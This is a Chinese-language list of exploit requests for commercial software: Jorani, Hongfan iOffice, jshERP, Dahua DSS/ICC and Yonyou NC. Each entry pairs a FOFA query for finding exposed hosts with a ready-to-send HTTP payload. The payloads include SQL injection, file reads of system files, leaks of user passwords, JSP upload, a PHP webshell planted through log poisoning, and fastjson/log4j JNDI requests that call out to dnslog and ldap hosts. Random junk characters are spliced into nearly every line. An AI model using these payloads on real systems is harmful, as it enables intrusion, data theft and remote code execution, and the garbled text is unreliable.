" z9 E. j& R% w) k9 O# _6 Z* X5 b3 mGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.15 m* C D2 l. {# v. @2 \
Host: 127.0.0.1
* G5 B C& b' K# n- g- _Pragma: no-cache
% F% ^$ }5 R* l0 L! R# DCache-Control: no-cache
% G m7 v. D& Y8 xUpgrade-Insecure-Requests: 1
- ^, T0 b$ m7 z& Y: j, F+ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 b: y! w+ k4 }* _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, f& z; P' N: @" g/ P2 U
Accept-Encoding: gzip, deflate/ v+ O. k7 b5 g4 N: Q# Z
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8% M' \. ]/ O. `, c, _0 z. r8 t
Connection: close3 ~) y) @ e# ~
( ]2 M! Q' D* K% i4 U& y& N
( T7 z0 O: K& n. l$ V
12. Jorani < 1.0.2 远程命令执行 b! s+ m0 k* W/ `/ @: Z
FOFA:title="Jorani"8 u3 i' m) F1 _% L
第一步先拿到cookie! z4 [# L% Q: w1 S; W- Z% K) {
GET /session/login HTTP/1.1/ _* q1 U& |5 d
Host: 192.168.190.30$ J h) z; ~7 Y4 Y: C
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
0 L3 ?: ]& [1 L: [+ oConnection: close3 M! f2 Z# o/ h: O+ N: ]
Accept-Encoding: gzip
/ p3 i2 p+ b: z q$ E- c. [# u4 h% T# d8 f
/ z; [* R( O! H W" B& m1 v
响应中csrf_cookie_jorani用于后续请求
+ h# D) W% O* EHTTP/1.1 200 OK* r' ^& g: L; ~$ Z" G7 k X# R
Connection: close
( z- ?' i# x% a7 dCache-Control: no-store, no-cache, must-revalidate
, ?: t5 e! R L, `. oContent-Type: text/html; charset=UTF-8
; y5 b( W" v, i/ YDate: Tue, 24 Oct 2023 09:34:28 GMT; b/ c+ V; Q2 ^: N7 J
Expires: Thu, 19 Nov 1981 08:52:00 GMT/ m1 p7 ~; ?3 H* G, h: J3 |- S8 ]2 E2 D
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT: f) a$ i/ k7 [- E- o- j
Pragma: no-cache
5 n6 E+ q5 E: M. h( CServer: Apache/2.4.54 (Debian)
6 f7 H% Y/ I: `8 M* MSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
- [# T1 H6 E8 \/ U2 pSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
, z5 l2 l4 ?/ D( k; C J6 p4 O% bVary: Accept-Encoding* C' v' G4 Z' m+ h+ h3 z
1 g# n! D% ~. s3 I1 x8 f1 E) h4 D( D8 M! k Q( w) `5 Z' [
POST请求,执行函数并进行base64编码
1 M7 B2 k; x uPOST /session/login HTTP/1.1
9 t0 U4 a% S1 s. j( ~8 oHost: 192.168.190.30; I V0 O$ R7 {6 i8 Y s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
- H" ]$ w' L( j1 I$ [- NConnection: close
7 b$ W! k6 K2 o; x2 [Content-Length: 252: `; ^' }7 P y0 `' z) J, K B
Content-Type: application/x-www-form-urlencoded
7 M+ H; x# h4 w0 Z: l, DCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
/ a/ Z3 q6 f; l; I1 R. B C" F0 Y! zAccept-Encoding: gzip/ n, ~: w7 Y/ ? O$ W
3 J2 E7 O7 `7 K; a! n" Ncsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor" W5 H) i( f- v+ p; w& e
2 }4 N* \0 C& B' ?+ m$ j" I% a
# `% L# J5 a& m
8 H7 W' R: q7 v9 V" i
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串2 }8 d* s1 T/ C8 U1 F
GET /pages/view/log-2023-10-24 HTTP/1.1
/ ?$ _, {6 W' Q$ Q/ ~Host: 192.168.190.30
( k+ p) E3 P* F6 \1 y2 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36- e$ G9 _$ ~; U r
Connection: close+ ?* K7 l3 h- b8 z" v& `1 K
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 K3 y6 i. e2 m& h8 T: K
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
+ Q( a9 @. N: n& H% b9 nX-REQUESTED-WITH: XMLHttpRequest
" G- }" i5 Q. {Accept-Encoding: gzip
$ b$ x# r2 t0 u( t. s F( z2 f2 i0 u/ z N9 C" J& [
( |% o# ?2 x" d4 Q2 R% K P7 j13. 红帆iOffice ioFileDown任意文件读取+ _7 [1 h" o% x$ V8 r# A2 ^
FOFA:app="红帆-ioffice": D/ ^$ u$ e5 e: ^" [$ u& X% m
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1$ U8 J' P- ?9 S* A% L
Host: x.x.x.x' U+ K/ o+ |' ]3 O1 _! ?9 n/ ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36; ]) L7 Q3 B- l7 J* t' R: U6 p
Connection: close
. i# B1 _* H7 z- f7 S) vAccept: */*& G8 L5 k0 \: K6 s- n( u4 t* [% K
Accept-Encoding: gzip
9 P' u9 k- C6 {; k& K
3 C6 g S1 o0 x2 D1 f4 F7 G$ k% O1 a6 c8 g7 c, b6 K+ {
14. 华夏ERP(jshERP)敏感信息泄露5 ~* @4 l; [5 R q. H" R! X
FOFA:body="jshERP-boot"
1 J0 F; u( Q0 s& o; f泄露内容包括用户名密码
9 K& i! _9 |' K5 SGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
6 e$ P( k7 y% lHost: x.x.x.x$ J* i" H2 d2 ?% `3 Z- E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
* M# ?4 ^( S+ D8 ]- a+ j7 eConnection: close* Q1 p! z* P( y! p0 Q
Accept: */*
K! f0 t1 z+ U. O2 FAccept-Language: en/ E; u2 `1 [/ d1 ?
Accept-Encoding: gzip& A- a0 v! r0 ?+ T+ W3 ~
% y, O5 n7 |+ ]2 f# J5 y5 c1 L2 o3 D
% @+ n$ o/ A/ E3 B" B% |. R0 k& O
15. 华夏ERP getAllList信息泄露( c; l y1 S& w* n; L
CVE-2024-0490
- ~: S( r2 p' L. _+ U6 Q1 i/ jFOFA:body="jshERP-boot"( W; Y" _2 Q+ F3 C1 W% F! G
泄露内容包括用户名密码2 y9 E- @) T& m( H
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
# U6 o8 L4 C) A1 oHost: 192.168.40.130:100" L( ]0 o2 S! o- T! n0 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36( B# m# v2 _2 Y7 U8 F6 J
Connection: close' A. q( ^' Z8 J- }! f9 A% V' e" ~
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8( n G$ M, A: _- u6 A3 \( V J# ~1 V
Accept-Language: en% e! S3 K3 l8 d3 F$ ^2 C$ h
sec-ch-ua-platform: Windows$ ?* @' F, L w
Accept-Encoding: gzip
2 W% J* @. O+ Q M
' s) D6 U2 a7 `# I$ j% ` r4 I* A+ @$ z/ M
16. 红帆HFOffice医微云SQL注入
5 O0 R6 [) m" ]6 qFOFA:title="HFOffice"2 I. _9 x r! R1 O" d. N
poc中调用函数计算1234的md5值& k- w* k8 z; o, c( l P% A3 H
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
- w. Z' @" P+ |* B( D5 r" ]. AHost: x.x.x.x; C! d$ J) C. K g
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
' A. p: K" |! r% w7 ~9 D+ J4 PConnection: close
0 V$ y% C5 b7 E; _Accept: */*6 G- U8 t( b* L% I, w" t$ U$ I$ O
Accept-Language: en
9 U9 P+ \9 h& mAccept-Encoding: gzip! g* M9 E/ O+ U' d
0 J6 {7 _/ v) k) i
( A) v5 }* R8 B9 b9 V17. 大华 DSS itcBulletin SQL 注入6 ]5 h! z* b4 `
FOFA:app="dahua-DSS"( R( r' n" `! ]# O
POST /portal/services/itcBulletin?wsdl HTTP/1.1
. T! ^( e* }! N$ p1 \% \* j6 m, IHost: x.x.x.x
4 O" }! d+ O& B' N; S wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. U) s1 B2 U/ O# b. o4 ]Connection: close
' g% }. r# `. ?& X7 c1 ~Content-Length: 345
7 U/ O6 F- e% l9 c5 Y, O9 b& |% c2 iAccept-Encoding: gzip! Q0 p- [- \' Q5 o* t: R7 S3 @
4 s* @$ B; u4 v5 U4 [1 J6 D+ g. j
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>( U1 p$ O8 |) J- j1 L% Y; G
<s11:Body>! T! x! o8 d Z# I% V" w% s. w
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
5 Q3 x, E7 |- B. R6 `8 {4 j <netMarkings>
$ M1 S" Y5 c. g( o+ R8 | (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
/ C, U/ L! @5 I5 Y </netMarkings>
) B6 `* ^) `( {0 Q; {+ [ </ns1:deleteBulletin>
: Y& F5 A6 b- B </s11:Body>- n+ M' y( Z) n0 F
</s11:Envelope>
9 |& M8 M3 H3 A$ s6 y% T2 ^ V' V* n# k( |/ P" z
6 v8 W- T/ B' u g' I& ?18. 大华 DSS 数字监控系统 user_edit.action 信息泄露- N9 s) ~7 U/ L) d( K
FOFA:app="dahua-DSS"
# s& D" q& h- kGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
2 }3 z n+ _: ~) y) {; YHost: your-ip
( o, c7 s9 l1 p, ], u6 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& s" y5 z( `( sAccept-Encoding: gzip, deflate
4 J, I8 J* t+ `. ^$ A6 Y* r/ qAccept: */*
9 \: `5 _, c. ?' wConnection: keep-alive
9 _6 e% V) m3 x1 G5 A6 V& v h1 m+ V$ a- _4 f
; U9 s, W7 w ~' q% V
3 g! Y2 R! f) H19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入! n& R0 D9 ?8 o, x4 r" U. ^
FOFA:app="dahua-DSS"
" E( ^% C$ Q8 o* }GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1+ i! D, K+ d9 E1 W$ d$ _9 j) n& s
Host:
" A" C& C" u1 U$ l- uUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 m2 R% q3 s5 O3 l f, qAccept-Encoding: gzip, deflate
1 u' W; y$ Z, Q) ]" R: s5 E3 CAccept: */*
# z$ E/ ?9 }4 Y7 N- K+ CConnection: keep-alive" V) q; R' l1 p0 t
f6 Q' p* E/ S6 \7 N# \6 @/ Q
' T: m- o5 B6 u, L
20. 大华ICC智能物联综合管理平台任意文件读取& b1 U5 B; E: C# j+ n! K
FOFA:body="*客户端会小于800*"
. E5 D9 l1 n( pGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
3 b$ x5 U2 L% ^* h2 _4 d/ UHost: x.x.x.x) I$ w% C8 e: K* @$ x: r+ [
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ ~; d3 I+ o, j$ k, n+ @
Connection: close- I* ?" X8 Z( J: x* u4 @
Accept: */*! Z% T& h" C! ^
Accept-Language: en
, o2 a5 o1 }3 z& L3 e0 gAccept-Encoding: gzip
7 r: n6 J! R' w6 P
0 H6 ]& g7 A5 w$ \, E8 ~$ C6 t8 P" w& ~' d9 R
21. 大华ICC智能物联综合管理平台random远程代码执行! w$ v3 I' i' _, s
FOFA:icon_hash="-1935899595"
6 u4 T/ B G& _$ xPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1/ c! u9 x. W, @+ F" k# ^
Host: x.x.x.x) M+ ~0 J- J( M8 j7 z# t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 H* M% y2 `5 H L S* dContent-Length: 161
9 I1 ]- p6 Z! ?8 t& @Accept-Encoding: gzip* v N6 J0 V T* j
Connection: close
4 r% n. b8 v( j7 _* L0 uContent-Type: application/json;charset=utf-8" N! q+ P$ x) F% Q
+ |4 K1 n9 o* ?# W) }1 K{% S4 l: d2 k4 B5 \
"a":{6 C5 O, x8 m2 z+ |# {5 G6 W
"@type":"com.alibaba.fastjson.JSONObject",2 o9 R# U* E/ }3 n& t
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}& @) @- V: r# L/ ]$ P
}""
9 f; M, Y1 h2 c' j# p2 T- {1 a}
. X' s5 _1 k2 U/ p/ M6 _* J1 R! Y
: B0 `8 r* U& Z Q, k% Z. I! E; t3 Q% v% R
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
% V/ P/ Q# N6 S$ W5 I8 _FOFA:icon_hash="-1935899595"
, N8 z" G6 ?& aPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1; R I- y" S' b1 A9 J2 z
Host: your-ip+ a% m( ^+ Q2 n) S& z. y/ J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 x$ T2 U7 n! D, ]- kContent-Type: application/json;charset=utf-8( H' e8 U b1 w
% A K# ?, [3 c8 V; z9 f$ A
{8 \& T1 s6 G: E$ P" @, \% {
"loginName":"${jndi:ldap://dnslog}"; l/ M# r& M D/ N
}
& X$ }. l) q9 a% Z- b* y
* ?$ t' _( Q/ y, l4 ^1 @) [5 a( b
" F0 m; r1 l3 f$ ^$ `) w5 a/ N0 n# \, e4 o6 v( u( s2 T
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
" s5 o- {: q1 w: x" F! i( KFOFA:icon_hash="-1935899595") I( H8 M" F* d
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
, [$ {5 Z7 |$ l. wHost: your-ip" s: Z0 U8 @# E6 K, ?& C9 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 b$ P* u0 D6 |
Content-Type: application/json;charset=utf-8# a% J3 ^8 z) l' o8 r" k
Accept-Encoding: gzip
* p5 {& ^9 E( ^8 Q& J; `7 MConnection: close
( a. N7 i. B6 T R% s8 `! N( ~
4 T0 [/ t( ~' y! R7 ]0 r{
% f/ k+ j: ]' @; \9 p7 a5 s' F "a":{
' p1 k# v) w; e7 ]9 L "@type":"com.alibaba.fastjson.JSONObject",
3 t5 `+ }* u% Q: W; B {"@type":"java.net.URL","val":"http://DNSLOG"}- L3 a; z4 ]. \* b
}""8 W" j1 D4 ]- b8 b3 \; n
}
I Y4 k- R; r2 J2 `1 c; R+ Z( K
, }9 ?2 q7 M3 I' q; Q/ A0 _# Y
/ B; E7 S+ H: Q" {! E8 ^24. 用友NC 6.5 accept.jsp任意文件上传
5 E' q0 |% {# G$ H+ S4 ?FOFA:icon_hash="1085941792"/ @2 e* b3 U! C8 { s8 z c
POST /aim/equipmap/accept.jsp HTTP/1.15 D) ^& D# A1 i
Host: x.x.x.x
2 Y! t+ R* E, FUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 K8 G( |' S! w4 u) F7 M
Connection: close
7 ]3 Q+ m6 `0 W8 BContent-Length: 449
9 L$ o- k f G- aAccept: */*% r, T; O, }3 T1 C( {0 ]
Accept-Encoding: gzip
' P7 d7 X+ L/ WContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
4 Z/ R8 V y+ i9 R* I8 q
! A9 d+ u# I4 U& L2 D! @-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc8 l' ~& W) S& ~% w$ o
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
. `+ A5 F; x5 zContent-Type: text/plain5 P" C3 o) \0 M
* \- A0 M; G* w4 z" ~4 T
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>! v* ?- P/ E f& n7 F- G, i
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc3 E1 Y! e5 H/ S. P! Q
Content-Disposition: form-data; name="fname"
$ d" _" U, y+ M# s5 |8 f/ V1 z. w& L- e9 @/ I
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp0 C: ?) @! a1 I4 [ c; p
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--7 Q8 u6 m3 ~3 Q! @1 w4 B8 |6 l+ S
+ q6 r/ o- [% f) ^( W' y
3 x( w0 N/ P6 r/ m. ` E3 J25. 用友NC registerServlet JNDI 远程代码执行
, O0 H! k1 b) p/ LFOFA:app="用友-UFIDA-NC"
`7 y4 v5 \4 A1 Q! rPOST /portal/registerServlet HTTP/1.1
7 U4 ~! A$ u0 fHost: your-ip% }0 ?) V5 h4 |5 h1 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
! t* Z1 b8 X# V/ y' CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9; u0 B* n7 \, @1 B ~$ d! M4 W9 E9 ?
Accept-Encoding: gzip, deflate
7 o- L. H/ D+ T* ?4 xAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
' u- @' Q7 Z: Q$ p, V& I' QContent-Type: application/x-www-form-urlencoded; l% X* T, ?$ p4 O$ I
7 y$ M* v# i; j4 ktype=1&dsname=ldap://dnslog
5 b( ^, N" o0 D7 v+ X3 j) u4 N, E6 m0 z9 J8 o, h. p. N
) R' {0 W- O- H8 B8 I) g& a: a* i- I
26. 用友NC linkVoucher SQL注入8 C. Q4 B" y) b- V- k9 \ w+ ]8 B
FOFA:app="用友-UFIDA-NC"
$ r0 s" M+ v' T0 mGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.17 Z3 u+ G `5 ?, e' f
Host: your-ip
' {6 S5 W* P# f4 ]$ m7 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 `/ p: x7 U& m+ zContent-Type: application/x-www-form-urlencoded3 g! E: s* \4 O, O
Accept-Encoding: gzip, deflate* X y6 P0 b2 {: U' A8 o
Accept: */*
1 a3 T: i' I4 q) NConnection: keep-alive8 b2 E$ Q2 e, k% V
6 {3 e9 y* V% d* K, d* z9 a# ~
# N& _* b0 a; g" q+ }, O27. 用友 NC showcontent SQL注入, i( ? g4 ?8 @# A9 L4 j
FOFA:icon_hash="1085941792"
' k% v% x ?4 L+ m' T) qGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1. ^! ~ w1 c' u2 X
Host: your-ip% T& h: @- W& C% m1 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ x/ u; V1 q2 n `1 c% M; x, QAccept-Encoding: identity
& u' p/ J: q! T5 u4 KConnection: close4 [; f, V& K3 I: N7 N+ K; M- K% d+ q
Content-Type: text/xml; charset=utf-8$ J0 p+ s$ o* l: \ f
5 y$ M8 _* J" A/ V, \. C
6 H0 a- g2 M0 C8 X( e. B& X28. 用友NC grouptemplet 任意文件上传5 M3 g. R* K& I2 ^' z x/ [! J" F
FOFA:icon_hash="1085941792"
0 a* v; a* `8 b* b1 {4 S$ h0 N5 U" ^POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.15 c, B& V/ r) n8 K& o: n& q& a' y
Host: x.x.x.x
. [2 K" C# T7 H' s" ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.368 L- }: R/ o6 O
Connection: close$ t" l0 s: k0 {
Content-Length: 268 Q d, R9 @ u' u# w9 z
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk; b; R. g# ]! Y& ?9 n4 j
Accept-Encoding: gzip
3 k) p Z9 q. O0 @3 L: C0 R5 F' ^
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
$ {4 a1 x- j2 n gContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"4 i# O5 ^; H9 v4 C
Content-Type: application/octet-stream
- l2 y# c- A3 c# f1 c' ?: U! P0 A7 m% N/ s0 \
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
0 T4 Y. @* i0 h# R0 w------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
; E G e8 j+ f" m, T$ @0 x/ R+ |4 ]! B; k$ c8 x7 E2 G Q
/ a- [3 @$ s7 W g1 ]
/uapim/static/pages/nc/head.jsp8 ^6 c" n' a* j% x
2 z1 G4 E% o! e! s* h& A29. 用友NC down/bill SQL注入3 l5 J/ z1 I* [) i
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- t( d3 `* T2 l3 HGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1) N' M% z% @' |# P/ N* U, E
Host: your-ip
7 S! ~3 X5 a: ?" ?' _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 ?+ \1 R8 I. k+ a4 ^8 C3 Y; H) l, y
Content-Type: application/x-www-form-urlencoded
9 S) Q7 }* ~& c6 D0 [Accept-Encoding: gzip, deflate
7 u- T5 e8 y' k$ W9 T" E9 FAccept: */*- Q# Y# ]! @+ k- T* m
Connection: keep-alive
y8 }' q1 [; B' Z! V5 Y; ~5 `+ G/ y1 j. ?! H; j
0 f+ [% ~7 t: T/ C% r B30. 用友NC importPml SQL注入
, l4 w; H- w' j( B2 u9 ~FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
; u& ]& U. h- O$ ]6 ], }- ~POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1- O; P4 A& R* _; w4 o! s
Host: your-ip
2 l! k, F) T. m3 k: f& G& v5 mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
9 H0 ]' f: p: s, j! F1 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 B1 s: K4 Y2 Q) k5 a/ |
Connection: close R, Y, x) i* i
( |% g+ w: E* ~3 N------WebKitFormBoundaryH970hbttBhoCyj9V) G9 k: z6 l2 f
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
$ F% Q3 I, k2 h3 U. m# f( ~Content-Type: image/jpeg) b# t& e7 b0 f
------WebKitFormBoundaryH970hbttBhoCyj9V--: a. p) u$ d# A! F4 Z* O; o
1 A! i" u8 c# z1 F/ E+ R! ~
9 z9 v& O/ l' k/ v
31. 用友NC runStateServlet SQL注入
& q9 U% Q# ^+ ]; ]version<=6.59 ]3 g5 U# s# H* K3 ~) x
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
. i* ^& }2 B! ?2 C2 KGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
' y: B6 B# w7 UHost: host
) o/ r3 Z8 A ?( W# K3 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.366 Q4 d2 N- m* I" W$ ?1 T6 B
Content-Type: application/x-www-form-urlencoded
- V4 V$ t! v0 g
7 B1 M3 S( [" m$ t* N: n7 l/ P% Q% p+ V+ S. C# A! t
32. 用友NC complainbilldetail SQL注入
& I: m$ k$ _, ~4 I9 E' K6 }version= NC633、NC65. S0 f7 \, S7 Z3 {9 ?) t3 _
FOFA:app="用友-UFIDA-NC"4 M. p. { s' q6 r1 T2 B9 L
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ N9 ?, B4 J& f- tHost: your-ip$ z, L$ M$ x6 @7 Y# x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 c3 B- \7 T; ~( j# Z7 ]% f
Content-Type: application/x-www-form-urlencoded3 s2 G; _3 j: z0 w- t
Accept-Encoding: gzip, deflate
/ E- b4 @3 J |) G- U- g9 _Accept: */*
" N0 b( ]0 g$ f5 G2 ZConnection: keep-alive" {6 E7 T$ W4 k/ u+ s) u# o. ? F) w$ w
& n2 C C9 |. M. A/ \' c
$ u6 `/ v O5 T33. 用友NC downTax/download SQL注入4 u3 \& \) x+ i( N3 U
version:NC6.5FOFA:app="用友-UFIDA-NC"
# L- ~% z7 {4 c lGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.15 l$ {+ ^. w* }8 T4 T2 K( s
Host: your-ip
4 x* v9 H. H2 V: u' nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 C( k0 S9 z3 n% w. q0 x
Content-Type: application/x-www-form-urlencoded
; z5 T, h0 a8 L- gAccept-Encoding: gzip, deflate2 w1 |( m# r( d3 E N
Accept: */*
! [/ k3 z" @. _3 [8 zConnection: keep-alive+ N3 U+ W& L }1 l/ R$ P) m
: o2 c3 ]' R, J" t
( S! ^6 d1 l/ K& c% X, N+ j3 z
34. 用友NC warningDetailInfo接口SQL注入
) A- M) t9 h7 @0 X+ ^' a) U0 UFOFA:app="用友-UFIDA-NC"
3 _+ s C, R- YGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1& Q- f/ S' h) l. |9 j C
Host: your-ip
5 M& V, C- D3 R3 S5 @* p* ?6 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 m4 T! p* g, q: I) ~5 a7 S+ {. rContent-Type: application/x-www-form-urlencoded
# ]- s( P1 j7 |6 nAccept-Encoding: gzip, deflate, r* }! X! e. `8 U+ S# _
Accept: */*0 A0 {7 u+ d) D
Connection: keep-alive
8 k0 E/ e; \. C+ Q0 ?0 g) i8 f* } \. L4 |# ]) r1 `& f! P
' L5 x+ Y' x5 T J _5 @35. 用友NC-Cloud importhttpscer任意文件上传
) F+ d' ?7 N+ ?. ]6 j0 l/ @- VFOFA:app="用友-NC-Cloud"9 E9 l0 o5 |9 p9 c, f5 Z% w
